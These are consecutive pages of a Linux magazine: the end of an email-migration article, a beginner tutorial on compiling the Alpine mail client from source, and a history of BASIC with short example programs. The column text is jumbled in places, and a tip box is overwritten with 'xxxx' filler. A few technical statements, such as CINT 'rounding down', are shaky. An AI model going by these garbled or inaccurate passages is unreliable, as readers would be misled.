  be an issue when moving an office to Linux. There       but there are replacements that claim a very high     an emulator. Results may vary, so lots of testing is
  are three main ways to handle this:                     degree of compatibility. One of the most notable      required, but there are also commercial variants of
   1 Replace the Windows program with a native            is ProjectLibre (www.projectlibre.org), a highly      Wine for additional compatibility. Wine tends to be
     Linux one.                                           featureful program that has won several awards.       better with older versions of applications, and the
   2 Fool the windows application to run on Linux            Sage accounting software for small businesses      compatibility database at http://appdb.winehq.org
     using an emulator.                                   has a huge market presence (especially in the UK)     describes how well certain versions work.
   3 Use virtualisation to run the Windows application    and if a direct Linux replacement like GnuCash           One of the most important tools everyone should
     in a virtual machine.                                (www.gnucash.org) doesn’t fit the requirement, then   get to grips with is virtualisation. Being able to
                                                          another option like virtualisation may be required.   create a virtual machine and run it inside your
  Replacing                                               Photoshop aficionados are well catered for, as one    main operating system is very useful for many
  This is always the best option from a performance       of the most famous open source applications is        reasons: it can be used to test out a variety of
  perspective, because you run a native program and       Gimp (www.gimp.org), but beware – it is just as       Linux distributions before making a commitment,
  not through an emulation layer or virtual machine.      complex as Photoshop to use. For more casual          or testing a new build before upgrading the main
  Microsoft Office is the most obvious starting point,    editing of photos you can do a lot worse than try     machines. In a migration, a program like VirtualBox
  and LibreOffice (www.libreoffice.org) is an excellent   Pinta (www.pinta-project.com).                        (www.virtualbox.org) can be used to run Windows
  replacement. File compatibility improves with each                                                            inside Linux, which is useful if you have one or two
  release, and the Draw package now even supports         Emulating and virtualising                            Windows programs for which there is simply no free
  compatibility with Visio files.                         “Run Windows applications on Linux” – that’s          software alternative. See issue 4 for our tutorial.



   The new functionality is added under the Menu
> Tools drop-down as ImportExportTools (it’s even
easier to find if you right-click on your Local Folders
icon). Choosing the option to “Import mbox file”
reveals a pop-up box with a list of options that
are not at first obvious, but the option Folder With
Subdirectories yields the best results.
   Where this process has problems is that that the
folder names are not imported or used and the folder
structure not kept, which makes for a messy import
and a subsequent manual process of renaming                                                                                             Select the destination folder
folders and nesting them they way you want. For                     POP3 or IMAP. However, the import of a MBOX file is                 to which the contents of the
this reason the original method is recommended for                  hard work. A separate folder creation/import process                MBOX are to be imported.
migrating from Outlook to Thunderbird. But if you do                is required for each individual MBOX, which could
have .pst files with little or no folder structure then it’s        soon drive you batty if you have a complex PST with
perfectly workable.                                                 many nested folders.
                                                                       Right-click on the main account folder (eg
Claws mail                                                          markyd@), select Create new folder and name it Old_
Claws was the second email client that we tested                    Mail. From the top line select File/Import Mbox File
tested: it has a reputation of being fast, if a little less         and in the pop-up box fill in the details of the source
fully featured than Thunderbird. It is simple to install            location of your MBOX file and the folder destination
and it was no hassle to configure accounts, either as               (Old_Mail in this case)
                                                                    and once executed the          “If you or your employees chose
                                                                    contents of the MBOX
                                                                    are imported into the
                                                                                                   an email client like Thunderbird,
                                                                    folder you created.            the move will be easy.”
                                                                       In summary, moving
                                                                    email over to Linux is
                                                                    a good first step in a transition away from Windows.
                                                                    If you or your employees choose an email client
                                                                    like Thunderbird, the move will be easy because of
                                                                    its familiar user interface. In a larger company, it’s
                                                                    important for users to know that they’re running
                                                                    a different program (ie they don’t just think it’s a
                                                                    different Outlook theme), and that some things will
                                                                    work differently. Good luck!

                                                                      Mark Delahay is an IT consultant who has spent many a year
Claws may be fast and simple but importing nested PST
                                                                      battling to overcome Microsoft’s so-called “solutions”.
files is very hard work.



                                                                       www.linuxvoice.com                                                                              85
     TUTORIAL BUILDING SOFTWARE



                                LINUX 101: COMPILING
           TUTORIAL
                                SOFTWARE FROM SOURCE CODE
                                Binary packages are all good and well, but to get the latest features
MIKE SAUNDERS
                                and useful patches, it’s worth building programs from source.


                                Y
                                         ou might think that it’s utterly pointless to      otherwise you need to compile the new release from
 WHY DO THIS?                            compile programs from their original,              its source code.
 • Get the latest programs               human-readable source code, given how                 And that’s not the only reason to do it: you can often
   without waiting for your
   distro to package them       many awesome binary package managers exist in the           enable hidden, experimental or unfinished features by
   up for you                   Linux world. And fair enough: in most cases it’s better     building from source. On top of this, you can apply
 • Enable non-standard          to grab something with apt-get or yum (or whatever          patches from other developers that add new features
   features and add new         your distribution uses) than to take the extra steps        or fix bugs that the software’s maintainers haven’t yet
   ones with patches
                                required to build things by hand. If a program is in your   sorted out. And when it comes to security, it’s good to
 • Stay extra secure by
   using binaries that you’ve   distro’s repositories, is up-to-date and has all the        know that the binary executables on your machine
   compiled yourself            features you need, then great – enjoy it.                   have been generated from the original developer’s
                                  But it doesn’t always work like that. Most distros        source code, and haven’t been tampered with by a
                                aren’t rolling-releases (Arch is one of the few Linux       malicious distro developer. (OK, this isn’t a big worry in
                                distributions that is) so you only get new versions of      Linux, but it’s another potential benefit.)
                                packages in the stable branches once or twice a year.          We’ve had several requests to run a tutorial on
                                You might see that FooApp, one of your favourite            compiling software, and explain some of the black
                                programs, has just reached version 2.0, but only            magic behind it. We often talk about compiling
                                version 1.5 is available in your distro’s package           programs in our FOSSpicks section, as it’s the only
                                repositories. So what do you do? If you’re in luck, you     way to get them – so if you’ve had trouble in the past,
                                might find a third-party repository for your current        hopefully you’ll be fully adept after reading the next
                                distro release with the latest version of FooApp, but       few pages. Let’s get started!


                                  1   GRABBING THE SOURCE
                                Although there are various build systems in use in the      page before you get started here, so that you don’t get
                                Free Software world, we’ll start with the most              lost as soon as you start.
Normally, documentation
files are in all uppercase      common one, generated by a package called GNU                  Here we’re going to build Alpine, a (very good)
and contain plain text – eg     Autotools. Compiling software makes heavy use of            text-mode email client that works as an ideal example
LICENSE, README and             the command line – if you’re fairly new to Linux, check     for this tutorial. We’ll be using Debian 7 here, but the
VERSION here.                   out the Command Line Essentials box on the facing           process will be similar or identical across other
                                                                                            distributions as well. These are the steps we’re going
                                                                                            to take, and you’ll use all or most of them with other
                                                                                            programs you compile:
                                                                                             1 Download the source code and extract it.

                                                                                             2 Check out the documentation.

                                                                                             3 Apply patches.

                                                                                             4 Configure to your liking.

                                                                                             5 Compile the code.

                                                                                             6 Install the binary executable files.

                                                                                               Alpine is a continuation of the Pine email client of
                                                                                            yesteryear. If you search for its official site you’ll see
                                                                                            that the “latest” version is 2.00, but that’s ancient
                                                                                            – some developers have continued hacking away on
                                                                                            it elsewhere, so go to http://patches.freeiz.com/
                                                                                            alpine to get version 2.11. (If a newer version has
                                                                                            arrived by the time you read this article, adjust the
                                                                                            version numbers in the following commands
                                                                                            accordingly.) The source code is contained in
                                                                                            alpine-2.11.tar.xz, so open a terminal and grab it like



86                                                              www.linuxvoice.com
                                                                                                        BUILDING SOFTWARE TUTORIAL

so:
wget http://patches.freeiz.com/alpine/release/src/alpine-2.11.     Command line essentials
tar.xz
                                                                   If you’re new to Linux and the command line, here are some
  This is a compressed archive that needs to be                    super quick tips. Open a command line via Terminal,
extracted. You can use the same command for                        Konsole or XTerm in your desktop menu. The most useful
archives that end in .tar.gz and .tar.bz2:                         commands are ls (to list files, with directories shown in
tar xfv alpine-2.11.tar.xz                                         blue); cd (change directory, eg cd foo/bar/, or cd .. to go
                                                                   down a directory); rm (remove a file; use rm -r for
  (If the file ends in .zip, try unzip <filename>.) As the         directories); mv (move/rename, eg mv foo.txt bar.txt), and
archive is extracted, you’ll see a bunch of files whizz            pwd (show current directory).
by on the screen – enter ls when the process is done                   Use less file.txt to view a text file, and q to quit the
and you’ll see a new directory. Enter cd alpine-2.11 to            viewer. Each command has a manual page (eg man ls)
switch into it. Now enter ls again to have a nosey                 showing options – so you can learn that ls -la shows a
                                                                   detailed list of files in the current directory. Use the up and
around and see what’s inside.                                      down arrow keys to cycle back through previous
  If you see a green file called configure, that’s great           commands, and use Tab to complete file or directory                    PRO TIP
– you can almost certainly start building the software             names: eg if you have longfilename.txt, enter rm long and
                                                                                                                                      If you want
                                                                                                                                      Xxxxx   xxx xxxto uninstall
                                                                                                                                                        xx xxxx xxx a
straight away. But nonetheless, it’s wise to check out             then hit Tab should complete the filename.
                                                                                                                                      xx xxx xx you’ve
                                                                                                                                      program     xxxx xxxcompiled
                                                                                                                                                             xxx xxx
the program’s own documentation first. Many                                                                                           xx xxxx
                                                                                                                                      from   source,
                                                                                                                                                xxx xxyou
                                                                                                                                                        xxxcan
                                                                                                                                                             xx xxxx
applications include INSTALL and README files along                 Similarly, check out the README as well. Alpine                   xxx xx xxx
                                                                                                                                      usually       make
                                                                                                                                                runxx  xxxx xxx xx
                                                                                                                                      uninstall
                                                                                                                                      xxx xx xxxx (asxxx
                                                                                                                                                       root)
                                                                                                                                                          xx xxx
                                                                                                                                                              at the
                                                                                                                                                                  xx
with the source code; these are plain text files that you        only has a README file, but it’s fairly decent,                      xxxx xxx
                                                                                                                                      same    stage
                                                                                                                                                 xx xxx
                                                                                                                                                      thatxxyou’d
                                                                                                                                                             xxxxxxrun
can read with the less command. Sometimes the                    explaining the commands required to build the source                 xxx xx install
                                                                                                                                      make     xxx xx in
                                                                                                                                                       xxxx
                                                                                                                                                          thexxx
                                                                                                                                                               text.
                                                                                                                                                                  xx
INSTALL file will contain “generic installation                  code, and listing the binary executable files that will be           xxx xxremoves
                                                                                                                                      This     xxxx xxxthexxfiles
                                                                                                                                                             xxx that
                                                                                                                                                                  xx
                                                                                                                                      xxxxcommand
                                                                                                                                      the   xxx xx xxxput xx in
                                                                                                                                                             xxxx
                                                                                                                                                                place
instructions”, with hundreds of lines of boring,                 produced. It’s lacking something important, though: a                earlier.
non-app-specific information, so it’s a good idea to             list of dependencies. Very few programs can be
ignore it. If the INSTALL file is short, to-the-point and        compiled with just a standalone compiler, and most
written specifically for the program in hand, skim               will need other packages or libraries installed. We’ll
through it to see what you need to do.                           come to this in a moment.


   2    APPLYING PATCHES
So, we’ve done steps 1 and 2 – downloading the                      This means that the new “threadsort” line in the
source and reading the documentation. In most cases              patch should be added after the first two (which
you’d want to go straight on the compilation step, but           already exist in the original code). But why doesn’t the
occasionally you may prefer to add a patch or two                patch simply use line numbers? Well, it’s possible to
beforehand. Put simply, a patch (aka a “diff”) is a text         do it that way, but then the patch becomes useless if
file that updates lines in the source code to add a new          you make even the tiniest change to the file yourself. If
feature or fix a bug. Patches are usually very small in          you add a line, all of the line numbers in the patch
                                                                                                                                     An example of a typical
comparison to the original code, so they’re an efficient         become out of sync, so you need to make a new one.                  patch: changed lines of
way to store and distribute changes.                             By having a few lines from the original code in the                 code begin with a ! symbol,
   If you go back to http://patches.freeiz.com/alpine,           patch, you have some context, so the patch can                      whereas new lines have +
you’ll see a list of “Most popular patches” near the top.        normally still be applied even if the code has been                 at the start.
Click on the “Enhanced Fancy Thread Interface” link to
go to http://patches.freeiz.com/alpine/info/fancy.
html. Along the top you’ll see links to patches for
various Alpine versions – so because we have Alpine
2.11, click the link with that number to download
fancy.patch.gz.
   Now move that file into your alpine-2.11/ directory.
You might be curious to have a peek inside the patch
to see how it works, but as it’s compressed you’ll need
to enter:
zless fancy.patch.gz
   Lines starting with *** show which source code
files are to be modified, and the + and ! characters at
the start of a line show lines that should be added or
changed respectively. So if you see something that
looks like this:
  char *debug_str = NULL;
  char *sort = NULL;
+ char *threadsort = NULL;



                                                                   www.linuxvoice.com                                                                                87
     TUTORIAL BUILDING SOFTWARE

                                                                                              can test the effects of the patch without actually
                                                                                              having to make any changes to the code by using the
                                                                                              --dry-run option, like so:
                                                                                              zcat fancy.patch.gz | patch -p1 --dry-run
                                                                                                 Here, zcat extracts the patch into plain text, and
                                                                                              then it’s piped with the | character into the patch tool.
                                                                                              (If you’ve never used it before, the pipe character is a
                                                                                              massively useful way to move data between
                                                                                              programs – you can send the output of one program
                                                                                              straight to another, without redirecting it via text files).
                                                                                                 Anyway, we use -p1 in this patch command
                                                                                              because we’re already inside the source code
                                                                                              directory; if you’re outside it (like, a level above in the
                                                                                              filesystem) or the patch doesn’t work, try removing it.
                                                                                              Once you execute this command, you’ll see lines like:
                                                                                              patching file alpine/setup.c
                                                                                                If it all works, re-run the command omitting the
                                                                                              --dry-run option, and the changes will be made
                                                                                              permanent. Congratulations – you’ve just spruced up
Many open source
                           changed by a different patch. To apply a patch, you                Alpine with a new feature! Some programs have
programs and games, such
as those we cover in       need to use the (surprise!) patch command.                         hundreds of patches from other developers, and
FOSSpicks, are only          This is installed by default in most distributions, so           patches are often rolled into the main source code
provided as source code.   you shouldn’t need to go hunting for it anywhere. You              once they’ve been well tested.


                              3    CONFIGURING AND COMPILING
                           We’re almost ready to compile the source code, but                 manual pages should go, and so forth. These are
                           there’s still one more important step: configuration. As           pretty generic and apply to almost every program you
                           mentioned earlier, many programs have features and                 build from source using this process, so scroll down
                           experimental options that are not compiled into the                to the Optional Features section – this is where the
                           executables by default, but can be enabled by                      fun begins.
                           advanced users. (Why don’t the developers simply                       In this section you’ll find features specific to Alpine.
                           include the features, but have a command line switch               The Optional Packages section beneath it also has
                           to enable them? Well, certain features can impact the              things that you can enable or modify using the
                           stability of the overall code, so they’re not compiled in          relevant command line flags. For instance, if you have
                           by default until they’re deemed as reliable.)                      a command line spellchecking program that you love,
                             Enter the following command:                                     and want to use it inside Alpine, you’ll see that there’s
                           ./configure --help | less                                          a --with-interactive-spellcheck option. You would use
                              This runs the configure script in the current                   it like so:
                           directory and spits out its help text to the less viewer           ./configure --with-interactive-spellcheck=progname
                           (that’s a pipe symbol before the less command).                    Providing progname is in your usual paths (eg /bin,
                           Scroll down and you’ll see that there’s a huge list of             /usr/bin, /usr/local/bin) then this should work.
                           options you can change: the installation prefix (where               Many of the options in Alpine’s configure script let
                           it should be installed, eg /usr/local/), where the                 you disable things rather than enable them. This is


                             The CMake alternative
                             While many programs still use the GNU Autotools approach of         The && here is important, and you might not have come
                             ./configure, make and make install (especially those programs    across it before if you don’t spend much time at the command
                             that are part of the GNU project), an alternative is becoming    line. Basically, it means: only run the following command if the
                             increasingly popular: CMake. This does a similar job, but it     previous command was successful. So only try to compile the
                             requires different commands, so we’ll go through them here.      code if the configuration step (cmake ..) went without any
                             As with Autotools-based programs, however, it’s well worth       problems. (You’ll often see shell scripts where multiple
                             checking out the README and INSTALL files (if they exist)        commands are strung together with && symbols, to make sure
                             before you do anything.                                          that everything runs in order and correctly.
                                Extract the program’s source code and cd into the resulting      After the software has been compiled, you’ll need to run the
                             directory. Then enter the following commands:                    make install step as root, as described in the main text (using
                             mkdir build                                                      su root -c in Debian and sudo in Ubuntu). The files will be
                             cd build                                                         copied into your filesystem, and you can run the program
                             cmake .. && make                                                 using its name.




88                                                             www.linuxvoice.com
                                                                                                        BUILDING SOFTWARE TUTORIAL

because Alpine is highly portable and runs on many
different operating systems, so if you’re compiling it
for a fairly obscure Unix flavour you may need to
disable some features.
   Now, there may be nothing that particularly takes
your fancy, so you can run the configure script on its
own like so:
./configure
  But configure also does something else that’s
important: it makes sure that your system has
everything needed to compile the program. For
instance, if you don’t have GCC installed, you’ll see an
error message saying that you don’t have a compiler.
On Debian and Ubuntu-based systems, a quick way to
get the basic packages required for compiling
software is to install the build-essential package. On
Debian (you’ll be prompted for your root password):
su root -c “apt-get install build-essential”
  And on Ubuntu (you’ll be prompted for your normal
                                                                                                                                Using the configure script
user password):                                                      README file in subsequent versions of the program…
                                                                                                                                you can customise the
sudo apt-get install build-essential                                 Once the configure script has run without any hitches,     installation locations and
   Now run ./configure again and see if any other error              enter the most important command of all:                   enable experimental or
messages come up. This is where it can start to get a                make                                                       advanced features.
bit messy, thanks to the complicated world of                           This does the compilation job, and depending on
dependencies – that is, external libraries that the                  the size of the program, it could take minutes (a small
program depends on. For instance, on Debian we got                   command line tool) to hours or days (LibreOffice). So
an error of “Terminfo/termcap not found”. That’s not                 grab a cuppa and check back in periodically. Once the
especially useful, as it doesn’t tell us which package               compilation is complete, you’ll need to copy the files
we need. But 20 seconds of Google searching for that                 into your filesystem – this requires root (admin)
error message provided a solution: we need to install                privileges. So on Debian:
libncurses5-dev.                                                     su root -c “make install”
                                                                       And on Ubuntu:
Finding dependencies                                                 sudo make install
A similar error popped up for PAM, which we resolved                    And that’s it! Start the program by typing its name
by installing libpam-dev. Ultimately there’s no magic                on the command line – eg alpine. And enjoy the warm
way to solve dependency issues, but you can usually                  fuzzy feeling of running a program that was compiled
get by with the README/INSTALL files, Google and                     on your own machine, with your own patches and
apt-cache search to find packages with names                         options, because you’re no longer a slave to the distro
relating to the error messages (you usually need ones                vendors. You can now grab and install programs
that end in -dev to compile programs from the                        before someone packages them up, and you’ll find it
source). If you get completely stuck, try asking on the              much easier to try the applications that we feature in
program’s forum or mailing list, or even try contacting              our FOSSpicks section. Happy times indeed.
the developer directly. You may even politely suggest                   If you’re a developer, you can use GNU Autotools to
that he/she includes a list of dependencies in the                   provide the same configure script and Makefile setup
                                                                     that many other programs use. This is better than
                                                                     rolling your own build scripts, as distro packagers
                                                                     prefer using established and well-known systems. An
                                                                     excellent – albeit extremely lengthy – tutorial can be
                                                                     found at http://autotoolset.sf.net/tutorial.html. You
                                                                     can ignore much of it (especially the sections on
                                                                     Emacs if you don’t use that editor), so skip down to
                                                                     the part that’s headlined “The GNU build system”. This
                                                                     is another name for Autotools, and the guide there will
                                                                     show you how to put the right files in place and set up
                                                                     their contents correctly so that users can simply run
                                                                     ./configure, make and make install as normal.

And here it is: our freshly baked, self-compiled Alpine mail          Mike Saunders has been compiling stuff for more than
                                                                      15 years, and once compiled a compiler for the ultimate
client. It’s not much to look at, but take it from us, it’s a very
                                                                      recursive experience.
fine mailer indeed.



                                                                       www.linuxvoice.com                                                               89
     TUTORIAL BASIC



                              BASIC: THE LANGUAGE THAT
           TUTORIAL
                              STARTED A REVOLUTION
                              Explore the language that powered the rise of the microcomputer –
     JULIET KEMP
                              including the BBC Micro, the Sinclair ZX80, the Commodore 64 et al.


                              L
                                     ike many of my generation, BASIC was the first        John Kemeny, who spent time working on the
 WHY DO THIS?                        computer language I ever wrote. In my case, it     Manhattan Project during WWII, and was inspired by
 • Learn the Python of               was on a Sharp MZ-700 (integral tape drive,        John von Neumann (as seen in Linux Voice 004), was
   its day
                              very snazzy) hooked up to my grandma’s old black          chair of the Dartmouth Mathematics Department
 • Gain common ground
   with children of the 80s   and white telly. For other people it was on a BBC         from 1955 to 1967 (he was later president of the
 • Realise how easy we’ve     Micro, or a Spectrum, or a Commodore. BASIC,              college). One of his chief interests was in pioneering
   got it nowadays            explicitly designed to make computers more                computer use for ‘ordinary people’ – not just
                              accessible to general users, has been around since        mathematicians and physicists. He argued that all
                              1964, but it was the microcomputer boom of the late       liberal arts students should have access to computing
                              1970s and early 1980s that made it so hugely popular.     facilities, allowing them to understand at least a little
                              And in various dialects and BASIC-influenced              about how a computer operated and what it would do;
                              languages (such as Visual Basic), it’s still around and   not computer specialists, but generalists with
                              active today.                                             computer experience. This was fairly far-sighted for
                                The very first version of BASIC (which stands for       the time – Kemeny correctly argued that computers
                              Beginner’s All-purpose Symbolic Instruction Code),        would be a major part of Dartmouth students’ future
                              Dartmouth BASIC, was designed and implemented at          lives even if they weren’t themselves ‘programmers’.
                              Dartmouth College in 1964. It was written by a team
                              of students working (often all night during the initial   Dartmouth BASIC
                              sessions) under the direction of the designers, John      His colleague, Thomas E Kurtz, another Dartmouth
                              Kemeny and Thomas Kurtz.                                  mathematics professor, was also enthusiastic about
                                In 1964, “computer” still meant a huge mainframe        this idea. Their aim was to make computers freely
                              machine, with very limited access. To run a program,      available to all students, in the same way as library
                              you needed to get it onto punch cards, submit your        books (Dartmouth was famous for its large open
                              punch cards to be run, then get more punch cards          access library). Later, Kurtz became director of the
                              back with the output of your program. It was a slow       Computation Centre, and later the Office of Academic
Here’s bwBASIC running        and opaque process, and initially only a very few         Computing, and the CIS program, at Dartmouth. He
the square root program,      people had any kind of access at all. However, in the     and Kemeny also developed True BASIC in the early
then using the LIST           early 1960s, less mathematically oriented students        1980s, which Kurtz still works on.
keyword interactively to      and researchers were just beginning to use                   Widening computer access meant dealing with two
show the code listing.        computers for their research.                             problems. One was the non-intuitive nature of ALGOL
                                                                                        and FORTRAN, the most popular languages at the
                                                                                        time. Kemeny and Kurtz felt that the more instruction
                                                                                        was needed to begin to write programs in a language,
                                                                                        the fewer students would end up using it. BASIC was
                                                                                        written to be intuitive, using keywords like GOODBYE
                                                                                        to log off. And although this very first version of BASIC
                                                                                        was compiled, it was still “compile and go” – meaning
                                                                                        that from the programmer’s point of view, compiling
                                                                                        and executing the program was a single step, and
                                                                                        feedback was immediate. (Later versions were
                                                                                        interpreted, meaning that programs ran without an
                                                                                        intermediate step in which the whole program was
                                                                                        compiled into machine code.) This all made it easier
                                                                                        for non-specialists to start programming.
                                                                                           The second problem was that computers were still
                                                                                        large, expensive machines taking up a whole room.
                                                                                        Actually providing each student and faculty member
                                                                                        with a computer was not remotely feasible. However,
                                                                                        a new idea had just arisen which would make



90                                                           www.linuxvoice.com
                                                                                                                           BASIC TUTORIAL

computer access much easier. This was time-sharing,
in which multiple teletypes were connected to a single
central computer. The computer would then allocate a
certain amount of time to each simultaneous user. So
the user could type in a BASIC program, and see it run,
from their teletype in another room. A time-sharing
scheme had just been implemented at MIT by John
McCarthy, who recommended the system to Kemeny
and Kurtz. But the Dartmouth Time-Sharing System,
which went live, along with BASIC, on 1 May 1964,
was the first successfully implemented large-scale
such system.
   Later, a few local secondary schools were also
added to the network, and eventually the Dartmouth
Educational Network was formed, allowing over 40                 due to its lacking a standard input/output library. It        Our Name program running
                                                                                                                               on bwbasic, again with the
colleges, 20 secondary schools, and a variety of other           has, though, had a huge effect on computer language
                                                                                                                               LIST keyword shown.
institutions to access computing facilities remotely.            development, largely due to the fact that it was used
Eighty percent of Dartmouth students were able to                as a standard algorithm description for years.
learn to program using BASIC and the DTSS.
   The first BASIC program run from a terminal ran on            Running Dartmouth BASIC
1 May, 1964 (exactly 50 years ago as I write this), and          An emulator is still theoretically available online, but
consisted, depending on who you ask, either of an                the online version no longer works at time of writing,
implementation of the Sieve of Eratosthenes (which               and the download version only exists for Mac and
finds prime numbers), or of this line:                           Windows. (It’s also seven years old so may not work
PRINT 2 + 2                                                      on either anyway; I was unable to test it.)
For historical resonance, try that in the emulators                 However, at least some Dartmouth BASIC
discussed below before you get started with the rest             programs ought to run with a modern BASIC
of the programs.                                                 interpreter. The Dartmouth BASIC manual from
                                                                 October 1964 is available online from Bitsavers.org (a
ALGOL                                                            fantastic resource). The second program listing in the
BASIC was loosely based on FORTRAN II and a little               manual will run with the bwbasic interpreter (available
bit of ALGOL 60. Kemeny and Kurtz initially tried to             as a package for Debian/Ubuntu) and ought to run on
produce a cut-down version of one of these                       any other BASIC interpreter, as it is pretty
languages; when this didn’t work, they moved on to               straightforward:
creating their own.                                              10 LET X = 0
   ALGOL, which exists in several variants, is                   20 LET X = X + 1
imperative and procedural. ALGOL 58 was intended to              30 PRINT X, SQR(X)
avoid the problems seen in FORTRAN, and eventually               40 IF X <= 100 THEN 20
gave rise to a huge number of languages including C              50 END
and Pascal. ALGOL 60 improved on ALGOL 58,                          As is fairly obvious (BASIC was after all designed to
introducing nested functions and lexical scope,                  be easy to read), this is just a loop that prints out x and
among other things. While very popular among                     its square root for the values 1 to 101. A couple of
research scientists, it was never commercially popular           notes: firstly, BASIC is case-sensitive in general, but in
                                                                 bwbasic, commands and functions are not case-
                                                                 sensitive. LET and let will do the same thing. (This is
  Other emulators                                                not true of all BASICs – many insist on caps.)
                                                                    Line numbers, as in the loop here, are used as
  Lots of other emulators are also available for various early
                                                                 labels. They are also used by the compiler to
  microcomputers and for BASIC. Here are a few options:
    A list of Spectrum emulators www.worldofspectrum.org/        automatically order the lines. You could write the lines
    emulators.html.                                              of code backwards in your file (from 50 down to 10),
    Two ZX81 emulators are available for Linux: SZ81 (http://    and the compiler would rearrange them for you and
    sz81.sourceforge.net), and Z81 (www.svgalib.org/rus/         run them in the correct order. It is a good idea to
    z81.html).
                                                                 number your lines in 10s rather than 1s, to make it
    Dartmouth BASIC (RFO BASIC) is available for Android
    http://laughton.com/basic.                                   easier to insert new lines in between. Unfortunately,
    And if you’re looking for type-in programs to try out,       bwbasic doesn’t include the RENUMBER command,
    the book BASIC Computer Games is available as an             which is in the ANSI BASIC standard, though it does
    online scan. (NB: this worked when I first looked at it,     include DO NUM and DO UNNUM (which number and
    then didn’t a week later. I include it here in the hope
                                                                 un-number the program lines, but do not change any
    that the problem is temporary.) www.atariarchives.
    orgbasicgames.                                               GOSUB or GOTO statements). Dartmouth BASIC
                                                                 didn’t have RENUMBER either, though.



                                                                   www.linuxvoice.com                                                                 91
     TUTORIAL BASIC

                                                                                      you could type BASIC statements straight in at the
                                                                                      prompt once the machine started.
                                                                                         Type-in programs – long listings for the user to type
                                                                                      in directly – were very popular in books and in
                                                                                      computer magazines. A lack of cheap portable
                                                                                      storage media (some machines took tapes, but
                                                                                      packaging a tape with a magazine was expensive in
                                                                                      the 70s; and few people had modems or bulletin
                                                                                      board access), combined with the fact that programs
                                                                                      had to be fairly short due to the memory and other
                                                                                      limitations of the machines, meant that it was
                                                                                      possible to type in even quite complicated programs.
                                                                                      However, type-ins could take hours, and the process
                                                                                      was error-prone for lots of reasons, including
                                                                                      programmer error, typing error, and poor-quality
                                                                                      printing. After the arduous process of typing in, the
                                                                                      eager reader would then have to track down the bugs
                                                                                      they’d introduced. When listings were all written in
                                                                                      straight BASIC, this wasn’t too hard. But as programs
                                                                                      became more complicated, it became more common
                                                                                      to have long listings of machine language or
Our Dice program typed
into BBC BASIC simulator.      This doesn’t use GOTO, as the IF/THEN statement        assembly code, with only a little snippet of BASIC
Note the error in line      only needs a single line. Run it with bwbasic test.bas    which handled POKEing this into various locations.
40 (later corrected by      to try it out. You can also use bwbasic interactively.       This was nearly impossible to debug. Tactics to
reentering the line).          Unfortunately, the first program in the Dartmouth      resolve this problem included checksum programs to
                            manual doesn’t run under bwbasic, as it relies on         apply to each line of machine code, but it made
                            READ and DATA behaving in certain ways. READ is           type-ins ever harder to use. Early on, you could often
                            used to read values from the next available DATA line.    send a small sum to the programmer in exchange for
                            It seems that in 1964 Dartmouth BASIC, when the           a tape of the program, and by the mid-1980s it was
                            program ran out of DATA lines, it would stop. In          becoming more common for magazines to include
                            bwbasic, it just stops reading in new values, but         tapes on the cover.
                            continues to run (if possible) with any values already       Another issue was that there were lots of different
                            present. This demonstrates one problem with               dialects of BASIC (all the manufacturers mentioned
                            translating BASIC programs between different              above had their own versions). Some programs might
                            dialects; the detail of the keywords can vary enough to   be transferable, or universal, since there was a shared
                            cause problems.                                           core set of keywords, but the detail of keyword
                                                                                      implementation varied, and some BASICs had
                            BASIC with microcomputers                                 keywords which others did not. (As demonstrated in
                            In the mid-1970s, advances in technology led to the       the two different dialects of BASIC in the next section.)
                            invention of the microprocessor – a single chip that      The various dialects meant that some magazines
                            could act as an entire CPU, rather than the many          were variant- or machine-specific, and some would
                            different components that made up a mainframe             add notes for changes to make to the printed listing
                            CPU. This in turn meant the emergence of                  for different machines. They would also add
                            microcomputers: small, relatively cheap computers         suggested changes that users could make to alter the
                            that could be used at home.                               printed program, promoting the fundamental idea
                               The first models were sold in kit form and were        behind BASIC that programming was something
                            very limited (like the Altair 8800, which had only        anyone could do.
                            256 bytes of RAM, and only switches and lights for           In 1984, COMPUTE! Magazine published a type-in
                            input/output); but very quickly, home users could         word processor, SpeedScript (later also published as a
                            get machines that were cheap, fairly easy to set up       book), which may have been the high point (in one
                            (they would often plug into a TV as a monitor), and       sense, at least) of type-in programming. In 1988, the
                            genuinely useful. Classic microcomputers of this          magazine discontinued all type-in programs, and
                            era included the Commodore 64 (the single highest-        type-ins in general faded around that time, though for
                            selling computer model of all time); the Sinclair         8-bit machines they lasted into the 1990s.
                            ZX-80, ZX-81 and Spectrum; the BBC Micro; and the
                            Apple II. All of these (and pretty much every other       BBC BASIC emulator
                            microcomputer of the time) had some variety of            There are various emulators available for various
                            BASIC as a built-in primary programming language          different manufacturers and brands of machine, but
                            and operating environment. You didn’t just write your     one of the easiest to use (and of a brand which was
                            programs in BASIC, you used BASIC to run them, and        very popular in the UK at the time) is the JavaScript



92                                                         www.linuxvoice.com
                                                                                                                          BASIC TUTORIAL

implementation of the BBC Micro JSBeeb (at http://
bbc.godbolt.org). You can load your own disc images,          GOTO Considered Harmful
as well as several discs from the StairwaytoHell.com          BASIC contained, from a reasonably early       is happening in the course of the program,
archive; but you can also type BASIC files in line-by-        version, the GOTO statement. A couple          where, and when).
line directly to the emulator. (Be warned that some of        of years later, Dutch computer scientist          However, in early versions of BASIC, due
the keys behave a bit strangely; I had to experiment to       Edsger Dijkstra wrote his classic essay        to interpreter limitations in handling FOR or
work out where it thought keys like =, +, *, etc were.)       Go To Statement Considered Harmful, arguing    WHILE (and single-line IF statements), GOTO
                                                              that the GOTO statement encourages messy       was essential. Modern versions of BASIC
   You can type in the program listings here exactly as       programming and makes it too easy to lose      deprecate it for uses other than returning to
given. If you type in a line without a line number, that      track of the program process (roughly, what    the top of a main loop.
line will be immediately executed. Lines with line
numbers are stored in memory. If you re-enter a given
line by number then the previous one is overwritten.           The same simulation for bwbasic is a little different
You can list the program currently in memory with           in the way it generates the random numbers:
LIST, and delete a range of lines with DELETE 10-100.       35 RANDOMIZE TIMER
   The four lines below comprise the first program I        40 FOR I = 1 TO DICENUMBER
remember writing in BASIC:                                  50 DICERANDOM = RND
10 PRINT “HELLO, WHAT IS YOUR NAME?”                        60 PRINT “DIE THROWN “; CINT( DICERANDOM * 5 + 1)
20 INPUT NAME$                                              70 NEXT
30 PRINT “HELLO “ NAME$                                     80 END
40 END                                                         bwbasic only implements RND without the
   Once you’ve typed that in, type RUN, which runs the      parameter, so our random number is somewhere
lines in memory, and it should do what you would            between 0 and 0.9999…. The CINT keyword (not
expect. BASIC listings at this sort of level are pretty     available in BBC BASIC, although INT does something
self-explanatory! Note that to get a string variable, you   similar) rounds a number down to the integer below it.
